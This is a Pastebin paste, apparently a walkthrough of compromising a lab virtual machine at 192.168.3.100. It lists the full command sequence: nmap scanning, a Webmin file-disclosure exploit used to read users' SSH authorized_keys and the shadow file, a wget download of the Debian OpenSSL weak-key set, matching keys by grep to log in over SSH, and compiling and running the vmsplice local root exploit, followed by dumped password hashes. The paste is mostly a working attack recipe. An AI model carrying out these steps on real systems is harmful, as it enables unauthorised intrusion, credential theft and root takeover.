API tools faq
paste
Advertisement
Guest User

g0tmi1k

a guest
Apr 1st, 2010
3,301
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.92 KB | None | 0 0
raw download clone embed print report
  1. nmap 192.168.3.1-255
  2.  
  3. nmap -sV -sS -O 192.168.3.100
  4.  
  5. firefox http://192.168.3.100
  6.  
  7. firefox http://192.168.3.100:10000
  8.  
  9.  
  10. firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
  11. *Webmin <> save. Filename: shadow
  12.  
  13. firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
  14. *Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
  15. http://milw0rm.com/exploits/5622        (perl)
  16. http://milw0rm.com/exploits/5720        (python)
  17. http://milw0rm.com/exploits/5632        (ruby)
  18. http://www.exploit-db.com/exploits/5622 (perl)
  19. http://www.exploit-db.com/exploits/5720 (python)
  20. http://www.exploit-db.com/exploits/5632 (ruby)
  21.  
  22. wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
  23.  
  24. perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
  25. perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
  26. perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
  27. perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys
  28.  
  29. tar jxvf debian_ssh_rsa_2048_x86.tar.bz
  30.  
  31. cd rsa/2048
  32.  
  33. grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
  34. grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
  35. *scans for the public key...*
  36.  
  37. ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
  38. exit
  39.  
  40. ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
  41. hostname
  42. uname -a
  43.  
  44. firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
  45. *Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
  46. http://milw0rm.com/exploits/5092         (c)
  47. http://www.exploit-db.com/exploits/5092  (c)
  48.  
  49. nano vmsplice.c
  50.  
  51. gcc vmsplice.c -o vmsplice
  52.  
  53. ./vmsplice
  54.  
  55. whoami
  56.  
  57.  
  58.  
  59. ----------------------------------------------------------------------------------------------------
  60. Users
  61. root:          root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
  62. vmware:        vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
  63. obama:         obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
  64. osama:         osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
  65. yomama:        yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
  66. ----------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!